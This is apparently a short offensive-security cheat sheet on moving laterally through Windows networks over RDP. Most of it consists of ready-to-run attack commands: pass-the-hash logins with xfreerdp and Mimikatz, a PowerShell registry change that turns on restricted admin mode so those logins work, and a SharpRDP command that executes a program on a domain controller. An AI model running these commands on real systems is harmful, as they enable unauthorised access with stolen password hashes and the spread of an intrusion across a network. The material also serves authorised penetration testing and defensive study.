If RDP is enabled, you can just login with credentials like how a regular admin or user would. An interesting thing to note is that if restricted admin is enabled, we may be able to PTH with RDP clients.

Restricted admin mode was made to allow sys admins to perform network logons(no clear text credential logon) with RDP.

PTH: xfreerdp /u:USER /d:DOMAIN /pth:<NTLM_HASH> -v<IP-ADDRESS>

Mimikatz PTH: sekurlsa::pth /user<USER> /domain:<domain> /ntlm<ntlm hash> /run:"mstsc.exe /restrictedadmin"

Note that if we get an error, we need to set a registry key enabling restricted admin mode.

PS > New-ItemProperty -Path"HKLM:\System\CurrentControlSet\Control\Lsa" -Name"DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

For regular lateral movement, SharpRDP is a tool that can help us

SharpRDP.exe computername=dc01 command=calc username=offense\administrator password=pass

Last updated